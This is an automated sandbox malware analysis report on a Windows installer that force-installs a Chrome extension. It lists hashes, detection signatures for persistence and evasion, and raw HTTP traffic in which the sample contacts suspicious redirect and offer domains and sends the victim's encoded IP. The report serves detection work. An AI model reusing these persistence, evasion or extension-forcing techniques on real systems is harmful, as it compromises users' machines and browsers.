Windows Analysis Report
inno-chrome-malware.exe

Overview

General Information

Sample Name: inno-chrome-malware.exe
Analysis ID: 801008
MD5: 0cc5612e909e1df2c53ae56ad258bb21
SHA1: f134a96132867224b2e0a0a06a6e21714de859d7
SHA256: 87c79d29737dca30e36aac1c90ac3eab82f71393b815a9d7c086565e257fd434
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Uses cmd line tools excessively to alter registry or file data
Modifies Chrome's extension installation force list
Obfuscated command line found
Creates an undocumented autostart registry key
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
PE / OLE file has an invalid certificate
Installs a Chrome extension
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: inno-chrome-malware.exe ReversingLabs: Detection: 12%
Source: inno-chrome-malware.exe Virustotal: Detection: 42% Perma Link
Uses 32bit PE files
Source: inno-chrome-malware.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_08e0c10ba840a28a\MSVCR90.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Directory created: C:\Program Files\WinApps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater
Source: inno-chrome-malware.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: 8_2_00007FF68FF11160 ??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,FindFirstFileW,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@0@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,GetFileAttributesW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@PEB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,printf,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@PEB_W@Z,?find@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEBA_KPEB_W_K@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@0@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@PEB_W@Z,??$?H_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@AEBV10@0@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,GetFileAttributesW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,FindNextFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAA@XZ, 8_2_00007FF68FF11160
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 22:41:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8%2BI6E7uAS71iqsdK54Zdnd9eqpVwk3a6%2FT70ARDCd9dYNsUxs2yyZC3D%2F0jgt%2FRLJZnzi%2Bo72eJmMFnR8sU%2BjUvQDY0SYNlU8W5GQ0uX9RewuU%2Fnxy%2BmwNH88pBrhMzg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795fa20559e23735-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Feb 2023 22:43:09 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/chromewebstore/2Content-Security-Policy: script-src 'report-sample' 'nonce-XZJLMJeVYxAt0sRqW1JRvg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';worker-src 'self';report-uri /webstore/cspreportCross-Origin-Opener-Policy: same-origin-allow-popups; report-to="coop_chromewebstore"Report-To: {"group":"coop_chromewebstore","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/chromewebstore"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffSet-Cookie: NID=511=SNOSRX4p6DbsClPKt4HLthxfBq-08A2IoV-m6hNyYoqlBl1yEMw8yeiL9gT1ajkwDLluXLizhtnfi9CcEmEkYyCCydfleMJodAyDIesBX96yJVOcRu-Vm2UdXfy3WENjR56ywnHN6HTanRNRSrDi8KDF15_xiIgxYZXkEC8FUCc; expires=Wed, 09-Aug-2023 22:43:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: inno-chrome-malware.tmp, 00000003.00000002.329799752.000000000018D000.00000004.00000010.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325335265.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, is-G6FEV.tmp.3.dr String found in binary or memory: http://aia.entrust.net/evcs2-chain.p7c01
Source: inno-chrome-malware.tmp, 00000003.00000002.329799752.000000000018D000.00000004.00000010.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325335265.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, is-G6FEV.tmp.3.dr String found in binary or memory: http://crl.entrust.net/csbr1.crl0
Source: inno-chrome-malware.tmp, 00000003.00000002.329799752.000000000018D000.00000004.00000010.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325335265.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, is-G6FEV.tmp.3.dr String found in binary or memory: http://crl.entrust.net/evcs2.crl0
Source: inno-chrome-malware.tmp, 00000003.00000002.329799752.000000000018D000.00000004.00000010.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325335265.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, is-G6FEV.tmp.3.dr String found in binary or memory: http://ocsp.entrust.net01
Source: inno-chrome-malware.tmp, 00000003.00000002.329799752.000000000018D000.00000004.00000010.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325335265.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, is-G6FEV.tmp.3.dr String found in binary or memory: http://ocsp.entrust.net02
Source: inno-chrome-malware.tmp, 00000003.00000002.329799752.000000000018D000.00000004.00000010.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325335265.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, is-G6FEV.tmp.3.dr String found in binary or memory: http://www.entrust.net/rpa0
Source: inno-chrome-malware.exe, 00000000.00000003.307407548.0000000002600000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, 00000000.00000003.316040944.000000000238D000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000001.00000003.312821686.0000000002373000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000001.00000003.312821686.00000000023AC000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.326759060.00000000023B2000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.326759060.00000000023C1000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.326759060.0000000002373000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325951796.00000000036E6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://getfiles.wiki/welcome.php
Source: inno-chrome-malware.tmp, 00000003.00000003.325211186.00000000007E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://getfiles.wiki/welcome.phpC:
Source: inno-chrome-malware.exe String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: inno-chrome-malware.tmp, 00000003.00000002.329799752.000000000018D000.00000004.00000010.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000003.00000003.325335265.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, is-G6FEV.tmp.3.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: inno-chrome-malware.exe, 00000000.00000003.307803208.0000000002600000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, 00000000.00000003.308304038.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000001.00000000.310401744.0000000000401000.00000020.00000001.01000000.00000004.sdmp, inno-chrome-malware.tmp.0.dr, inno-chrome-malware.tmp.2.dr String found in binary or memory: https://www.innosetup.com/
Source: inno-chrome-malware.exe, 00000000.00000003.307803208.0000000002600000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.exe, 00000000.00000003.308304038.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, inno-chrome-malware.tmp, 00000001.00000000.310401744.0000000000401000.00000020.00000001.01000000.00000004.sdmp, inno-chrome-malware.tmp.0.dr, inno-chrome-malware.tmp.2.dr String found in binary or memory: https://www.remobjects.com/ps
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: unknown DNS traffic detected: queries for: clients2.google.com
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /welcome.php HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /r.php?key=pvwarw3 HTTP/1.1Host: exturl.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /redirect.php HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /?format=jsonp&callback=getIP HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /redirect.php?gjhagdjfbdjk=ODQuMTcuNTIuMTM= HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://getfiles.wiki/redirect.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offersss.clickConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=ODQuMTcuNTIuMTM=Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /js15_as.js HTTP/1.1Host: s10.histats.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offerszzzz.clickConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=ODQuMTcuNTIuMTM=Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1675809684220&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-GB&@u1280&@b1:-121844902&@b3:1675809684&@b4:js15_as.js&@b5:60&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DODQuMTcuNTIuMTM%3D&@w HTTP/1.1Host: s4.histats.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=ODQuMTcuNTIuMTM=Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: HstCfa4708787=1675809684220; HstCla4708787=1675809684220; HstCmu4708787=1675809684220; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJW2yQEIo7bJAQjEtskBCKmdygEI6PPKAQiUocsBSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-GB&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJW2yQEIo7bJAQjEtskBCKmdygEI6PPKAQiUocsBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic HTTP traffic detected: GET /webstore/inlineinstall/detail/jncffhgjbmpggpdflbbkhdghjipdbjkn HTTP/1.1Host: chrome.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Too many similar processes found
Source: reg.exe Process created: 43
Uses 32bit PE files
